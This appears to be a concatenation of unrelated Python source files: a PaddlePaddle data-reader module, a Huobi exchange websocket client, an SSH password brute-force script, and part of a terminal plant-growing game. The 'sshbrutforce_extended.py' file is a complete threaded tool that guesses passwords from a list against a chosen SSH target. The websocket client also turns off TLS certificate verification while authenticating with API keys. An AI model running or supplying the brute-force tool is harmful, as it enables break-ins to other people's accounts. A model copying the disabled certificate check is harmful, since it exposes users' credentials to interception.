train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
    Create a Python reader for data feeding in Python.
    This layer returns a Reader Variable.
    It works much like :code:`py_reader`, except that its input is a
    :code:`feed_list` instead of :code:`shapes`, :code:`dtypes` and :code:`lod_levels`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
        name(basestring): The prefix of the Python queue name and Reader name.
            None will be generated automatically.
        use_double_buffer(bool): Whether to use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
import paddle.fluid.compiler as compiler
def network(img, label):
                # User-defined network. Here, a simple regression as an example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
MEMORY_OPT = False
USE_CUDA = False
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
build_strategy = fluid.BuildStrategy()
            build_strategy.memory_optimize = MEMORY_OPT
compiled_prog = compiler.CompiledProgram(
fluid.default_main_program()).with_data_parallel(
loss_name=loss.name,
build_strategy=build_strategy,
                    exec_strategy=fluid.ExecutionStrategy())
for epoch_id in range(2):
reader.start()
try:
while True:
exe.run(compiled_prog, fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
    have name suffixes to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
        shapes(list): List of tuples declaring the data shapes.
        lod_levels(list): List of ints declaring the data lod_level.
        dtypes(list): List of strings declaring the data types.
        thread_num(int|None): The number of threads used to read the files.
            Default: min(len(filenames), cpu_number).
        buffer_size(int|None): The buffer size of the reader. Default: 3 * thread_num.
        pass_num(int): Number of passes to run.
        is_test(bool|None): Whether `open_files` is used for testing or not. If it
            is used for testing, the order of the generated data is the same as
            the file order. Otherwise, the data order is not guaranteed to be the
            same between epochs. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, six.string_types):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
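# The two helpers below build "decorated" readers (shuffle, batch, double
# buffer, multi-pass) on top of an existing reader variable. The shared
# variant creates the reader op in the startup program (persistable) and
# copies it into the main program; the unshared variant creates the op
# directly in the main program only.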
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Creates a data reader whose data output is shuffled.
    Output from the iterator created by the original reader will be
    buffered into a shuffle buffer and then shuffled. The size of the shuffle
    buffer is determined by the argument buffer_size.
    Args:
        reader(callable): the original reader whose output will be shuffled.
        buffer_size(int): the size of the shuffle buffer.
Returns:
callable: the new reader whose output is shuffled.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
shuffle_reader = fluid.layers.shuffle(reader=batch_reader, buffer_size=5000)
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
    'batching' decoration on it. When reading with the resulting
decorated reader, output data will be automatically organized
to the form of batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
        # Every 5 adjacent instances will be automatically combined into
        # a batch, so what we get ('data') is a batch of data instead of
        # a single instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
    Wrap a double buffer reader. The data will be copied to the target place
    with a double buffer queue. If the target place is None, the place the
    executor runs on will be used.
    Args:
        reader(Variable): the reader variable that needs to be wrapped.
        place(Place): the place of the target data. Default is the same place
            the executor runs on.
        name(str): Variable name. None if the user does not care.
    Returns:
        The wrapped reader with double buffer.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.open_files(filenames=['mnist.recordio'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
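# Used by open_files() when pass_num > 1: wraps a reader so it yields data for
# pass_num passes before signalling end-of-file.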
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
            shapes=[(-1, 784), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.io.open_files(
filenames=['./data1.recordio', './data2.recordio'],
shapes=[(3, 224, 224), (1, )],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@signature_safe_contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog._create_block()
yield
self.main_prog._rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in six.moves.range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, attrs=attrs)
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
from huobi.base.printtime import PrintDate
from huobi.constant.system import ApiVersion
from huobi.impl.utils.apisignaturev2 import create_signature_v2
from huobi.impl.utils.timeservice import get_current_timestamp
from huobi.impl.utils.urlparamsbuilder import UrlParamsBuilder
from huobi.impl.utils.apisignature import create_signature
from huobi.exception.huobiapiexception import HuobiApiException
from huobi.impl.utils import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
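# The websocket-client library invokes these module-level callbacks; each one
# looks up the owning WebsocketConnection in the handler dict above and
# forwards the event to it.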
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connecting...")
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connection event loop down")
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
# threading.Thread.__init__(self)
self.__thread = None
self.__market_url = "wss://api.huobi.pro/ws"
self.__trading_url = "wss://api.huobi.pro/ws/" + request.api_version
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger("huobi-client")
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
host = urllib.parse.urlparse(uri).hostname
if host.find("api") == 0:
self.__market_url = "wss://" + host + "/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
else:
self.__market_url = "wss://" + host + "/api/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
if request.is_trading:
self.url = self.__trading_url
else:
self.url = self.__market_url
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
self.logger.warning("[Sub][" + str(self.id) + "] Reconnecting after "
+ str(self.delay_in_second) + " seconds later")
def re_connect(self):
if self.delay_in_second > 0:
self.delay_in_second -= 1
self.logger.warning("In delay connection: " + str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info("[Sub][" + str(self.id) + "] Already connected")
else:
self.__thread = threading.Thread(target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
#print("sending data :", data)
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error("[Sub][" + str(self.id) + "] Closing normally")
def on_open(self, ws):
#print("### open ###")
self.logger.info("[Sub][" + str(self.id) + "] Connected to server")
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.is_trading:
try:
if self.request.api_version == ApiVersion.VERSION_V1:
builder = UrlParamsBuilder()
create_signature(self.__api_key, self.__secret_key,
"GET", self.url, builder)
builder.put_url("op", "auth")
self.send(builder.build_url_to_json())
elif self.request.api_version == ApiVersion.VERSION_V2:
builder = UrlParamsBuilder()
create_signature_v2(self.__api_key, self.__secret_key,
"GET", self.url, builder)
self.send(builder.build_url_to_json())
else:
self.on_error("api version for create the signature fill failed")
except Exception as e:
self.on_error("Unexpected error when create the signature: " + str(e))
else:
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
exception = HuobiApiException(HuobiApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error("[Sub][" + str(self.id) + "] " + str(error_message))
def on_failure(self, error):
self.on_error("Unexpected error: " + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
if isinstance(message, (str)):
#print("RX string : ", message)
json_wrapper = parse_json_from_string(message)
elif isinstance(message, (bytes)):
#print("RX bytes: " + gzip.decompress(message).decode("utf-8"))
json_wrapper = parse_json_from_string(gzip.decompress(message).decode("utf-8"))
else:
print("RX unknow type : ", type(message))
return
if json_wrapper.contain_key("status") and json_wrapper.get_string("status") != "ok":
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("err-code") and json_wrapper.get_int("err-code") != 0:
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("op"):
op = json_wrapper.get_string("op")
if op == "notify":
self.__on_receive(json_wrapper)
elif op == "ping":
ping_ts = json_wrapper.get_string("ts")
self.__process_ping_on_trading_line(ping_ts)
elif op == "auth":
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
elif op == "req":
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("action"): # for V2
action_name = json_wrapper.get_string("action")
if action_name == "ping":
action_data = json_wrapper.get_object("data")
ping_ts = action_data.get_string("ts")
self.__process_ping_on_v2_trade(ping_ts)
elif action_name == "sub":
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("subscribe ACK received")
else:
logging.error("receive error data : " + message)
elif action_name == "req": #
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("signature ACK received")
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
else:
logging.error("receive error data : " + message)
elif action_name == "push":
action_data = json_wrapper.get_object("data")
if action_data:
self.__on_receive(json_wrapper)
else:
logging.error("receive error push data : " + message)
elif json_wrapper.contain_key("ch"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("rep"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("ping"):
ping_ts = json_wrapper.get_string("ping")
self.__process_ping_on_market_line(ping_ts)
else:
print("unknown data process, RX: " + gzip.decompress(message).decode("utf-8"))
def __on_receive(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
if self.request.auto_close:
self.close()
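    # Keep-alive handling. The server-side ping format differs per line, and
    # each handler below echoes the timestamp back in the matching pong format:
    #   trading line (v1):  {"op": "ping", "ts": ...}  -> {"op": "pong", "ts": ...}
    #   market line:        {"ping": ...}              -> {"pong": ...}
    #   trading line (v2):  {"action": "ping", "data": {"ts": ...}}
    #                       -> {"action": "pong", "data": {"ts": ...}}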
def __process_ping_on_trading_line(self, ping_ts):
#self.send("{\"op\":\"pong\",\"ts\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"op\":\"pong\",\"ts\":" + str(ping_ts) + "}")
return
def __process_ping_on_market_line(self, ping_ts):
#self.send("{\"pong\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"pong\":" + str(ping_ts) + "}")
return
def __process_ping_on_v2_trade(self, ping_ts):
# PrintDate.timestamp_to_date(ping_ts)
self.send("{\"action\": \"pong\",\"data\": {\"ts\": " + str(ping_ts) +"}}")
return
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error("[Sub][" + str(self.id) + "] Connection is closing due to error")
|
sshbrutforce_extended.py
|
import socket
import threading, time
import paramiko, sys, os, termcolor
stop_flag = 0
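# stop_flag is flipped to 1 by the first worker thread that authenticates
# successfully; the main loop below stops spawning new threads once it is set.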
def ssh_connect(password):
global stop_flag
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(host, port=22, username=username, password=password)
        stop_flag = 1
        print(termcolor.colored(('[+] Found Password: ' + password + ', For Account: ' + username), 'green'))
    except Exception:
        print(termcolor.colored(('[-] Incorrect Login: ' + password), 'red'))
    finally:
        ssh.close()
host = input('[+] Enter Target Address: ')
username = input('[+] SSH username: ')
input_file = input('[+] Passwords file: ')
print('Trying to connect...\n')
# check if file exists
if not os.path.exists(input_file):
print('[!!] That file/Path does not exist')
sys.exit(1)
print(termcolor.colored(('* * * Starting Threaded SSH bruteforce on ' + host + ' with Account: ' + username + ' * * *'), 'blue'))
with open(input_file, 'r') as file:
for line in file.readlines():
if stop_flag == 1:
t.join()
exit()
password = line.strip()
t = threading.Thread(target=ssh_connect, args=(password,))
t.start()
time.sleep(0.5)
|
botany.py
|
#!/usr/bin/env python3
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
'cursed',
'buff',
'narcotic',
'gnu/linux',
'abraxan', # rip dear friend
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
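        # Each tier takes roughly 2/3 of the remaining range, which works out
        # to roughly 67% common, 22% uncommon, 7% rare, 2% legendary and 1%
        # godly.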
        CONST_RARITY_MAX = 256
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2/3)*CONST_RARITY_MAX)
uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
        # parameterized queries avoid breaking (or being abused) when a
        # visitor name contains quotes
        for name in visitor_names:
            c = conn.cursor()
            c.execute("SELECT * FROM visitors WHERE garden_name = ? AND visitor_name = ?",
                      (self.owner, name))
            data = c.fetchone()
            if data is None:
                sql = "INSERT INTO visitors (garden_name, visitor_name, weekly_visits) VALUES (?, ?, 1)"
                c.execute(sql, (self.owner, name))
            else:
                sql = "UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = ? AND visitor_name = ?"
                c.execute(sql, (self.owner, name))
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] <= int(time.time()):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0o666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
# TODO: this considers a plant watered only on day 1 and day 4 to be
# watered for all 4 days - need to figure out how to only add score
# from 24h after each watered timestamp
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
